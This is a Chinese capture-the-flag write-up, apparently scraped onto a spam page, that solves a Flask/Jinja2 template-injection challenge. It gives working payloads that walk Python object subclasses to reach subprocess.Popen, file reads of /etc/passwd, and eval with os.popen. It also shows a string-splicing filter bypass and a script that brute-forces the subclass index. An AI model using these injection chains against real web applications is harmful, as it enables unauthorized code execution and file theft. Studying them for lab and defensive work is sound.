当前位置：首页 > news >正文

公司申请网站需要哪些材料网站免费制作平台

news 2025/7/1 21:58:37

公司申请网站需要哪些材料,网站免费制作平台,免费建立国外网站,wordpress底面有虚线这么办目录 subprocess.Popen FILE warnings.catch_warnings site._Printer 这题很明显就是 SSTI了源代码我们试试看 {{7*7}} 然后我们就开始吧原本我的想法是直接{{url_for.__globals__}} 但是回显是直接500 猜测过滤我们正常来吧 {{"".__class__}} 查看当前…

subprocess.Popen

FILE

warnings.catch_warnings

site._Printer

这题很明显就是 SSTI了

源代码

我们试试看

然后我们就开始吧

原本我的想法是直接{{url_for.__globals__}}

但是回显是直接500 猜测过滤我们正常来吧

{{"".__class__}}  查看当前情况{{"".__class__.__base__}} 查看基类 这里发现没有利用的 我们修改代码{{"".__class__.__mro__}}  查看全部类  发现存在<type 'object'>了{{"".__class__.__mro__[2].__subclasses__()}}  查看object的子类

这里我们需要 os 来调用

但是这里存在一个类可以不需要os

subprocess.Popen

Python3 subprocess | 菜鸟教程

需要参数

("命令",shell=True,stdout=-1)这里 stdout  就是指定输出 PIPE

然后我们可以使用其方法来进行交互

("命令",shell=True,stdout=-1).communicate()

这样我们就可以实现rce

首先通过脚本跑出来其的位数

import timeimport  requestsbase_url="http://1a3ad76d-35d3-4a35-97fb-8997c87bf989.node4.buuoj.cn:81/?search="for i in range(300):payload="{{\"\".__class__.__mro__[2].__subclasses__()[%s]}}"%ir = requests.get(url=base_url + payload)if "subprocess.Popen" in r.text:print(i)if r.status_code == 429:time.sleep(0.5)

跑出来是258

我们开始构造

?search={{''.__class__.__mro__[2].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0].strip()}}最后的.communicate()[0].strip() 通过 communicate方法 输出 并且指定数组 去除空白符

我们看看 flasklight看看

?search={{''.__class__.__mro__[2].__subclasses__()[258]("cat /flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0].strip()}}

FILE

这是另一个方法通过file读取文件

首先我们要测试一下

先查找一下 file

发现是40

然后我们看看

{{"".__class__.__mro__[2].__subclasses__()[40]}}

/?search={{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}

读取成功

然后我们去读一下命令行吧

发现读出了路径

我们看看这个py

但是还是没有办法直接读取出来因为不知道flag的文件名字

warnings.catch_warnings

我们首先找一下这个类的位数

{{"".__class__.__mro__[2].__subclasses__()[59].__init__}}

这里就卡住了因为我们还是需要 globals的参与

我们如何绕过过滤呢

{{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']}}

这样就可以

我们在上面也知道是通过匹配过滤的

做到这个我们其实就可以正常rce了但是还是完善一下这个类的用法吧

这里我们能发现这个类没有加载 os 需要我们手动加载

我们需要在其

['__builtins__']['eval']

下导入

payload

?search={{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

这样就借助 os 实现了 rce

site._Printer

我们知道了 globals可以拼接绕过

这个方法也可以实现我们看看里面是否内置了 os

?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']}}

发现存在我们直接rce即可

?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}

最后读取即可

查看全文

http://www.dinnco.com/news/13297.html

当牛做吗网站源代码分享百度云百度客服人工电话24小时

网站建设合同免责声明网站如何快速被百度收录

苏州市建设职业中心网站seo关键词优化培训班

如何用自己电脑做销售网站网站域名备案信息查询

wordpress文章显示作者信息知乎seo排名的搜软件

网站目录程序软文代发

辽宁建设局网站首页什么软件可以搜索关键词精准

四川省人民政府官方网站国外搜索引擎入口

网站建设域名注册seo引擎优化专员

南京网站seo优化公司东莞网站营销推广

subprocess.Popen

FILE

warnings.catch_warnings

site._Printer

相关文章：